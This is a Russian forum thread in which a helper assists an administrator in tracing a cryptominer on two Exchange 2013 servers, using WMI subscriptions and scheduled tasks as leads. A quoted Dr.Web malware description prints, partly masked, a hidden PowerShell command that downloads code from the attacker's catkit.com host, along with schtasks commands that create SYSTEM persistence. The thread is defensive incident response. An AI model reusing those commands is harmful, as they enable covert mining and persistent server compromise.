запуск майнера на серверах с MS Exchange 2013

Здравствуйте.
Собственно снова вирусы на двух MS Exchange 2013. В скриншоте показал строку c бякой.
Файл WACS.EXE нормальный, используется для сертификатов ssl.
Помогите отыскать заразу.

процесс rundll32.exe (с внедренным майнером) закрыли перед созданием  образа автозапуска?
может переделаете образ автозапуска с активным процессом, чтобы можно было увидеть какой процесс ему внедряет майнера?

пока что видно несколько заданий, запускаемых из WMI:
WMI:\\.\ROOT\SUBSCRIPTION\.[F5BR1LMHB]
WMI:\\.\ROOT\SUBSCRIPTION\.[FKB6RDNGR]
WMI:\\.\ROOT\SUBSCRIPTION\.[FOQ6EDPWMK]
WMI:\\.\ROOT\SUBSCRIPTION\.[FUTWMFBRLE4]

+
по второму серверу сделайте образ автозапуска, чтобы было с чем сравнить

Эх!!! Только закрыл процесс на двух серверах, т.к. люди работать не могут, после прочитал... Запускается в 2:30 каждый день, как самостоятельно его запустить не знаю, завтра утром сделаю. Можно время перевести вперед попытаться, но боюсь что на экчандже проблемы будут.

Цитата
Владимир Шариков написал: Запускается в 2:30 каждый день

В Задачах:

Полное имя                  T.NETCATKIT.COM
Имя файла                   T.NETCATKIT.COM
Тек. статус                 в автозапуске
                           
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                           
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\T.NETCATKIT.COM
                           
https://www.virustotal.com/gui/url/1d48c0de95f50662b0a356670209877bf3938263f8921484­58963b4f09b82ad2/detection

да, T.NETCATKIT.COM тоже может быть частью заданий злоумышленников

Цитата
Владимир Шариков написал: Можно время перевести вперед попытаться, но боюсь что на экчандже проблемы будут.

не нужно,
как процесс запустится, сделайте образы автозапуска, потом процессы можно закрыть, вечером посмотрим образы, и напишем скрипты очистки

drweb.ru

Цитата

Trojan.DownLoader38.26327 Добавлен в вирусную базу Dr.Web: 2021-04-08 Техническая информация Для обеспечения автозапуска и распространения Создает или изменяет следующие файлы    <SYSTEM32>\tasks\t.netcatkit.com    <SYSTEM32>\tasks\xr6ziynzn Вредоносные функции Загружает    http://+t.###+catkit.com/a.jsp?re################################ as %username% Сетевая активность UDP    DNS ASK t.###catkit.com Другое Создает и запускает на исполнение    '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c (New-Object Net.WebClient).DownloadString('http://'+##.##t'+'catkit.com/a.jsp?re############################################################## Win32_ComputerSystemProduct).UUID,(random))-joi...' (со скрытым окном) Запускает на исполнение    '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 120 /tn t.netcatkit.com /F /tr t.netcatkit.com    '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn \xr6zIYnZN /F /tr "powershell -c PS_CMD"    '<SYSTEM32>\schtasks.exe' /run /tn \xr6zIYnZN

+
https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html

да, это было в предыдущей атаке Proxylogon на эти же сервера,
но здесь еще есть новые задания WMI, потому лучше полный образ получить с нагруженным процессом rundll32.exe
и второй образ проверить, что в нем есть

В общем самодеятельность моего начальника привела к тому что, он самостоятельно, без моего ведома, запустил Малвербайт на этих серверах.
Правда это дало результат, сегодня всё в нормальном состоянии... Скинул на всякий случай отчет из него. Но зараза возможно что снова прилетит?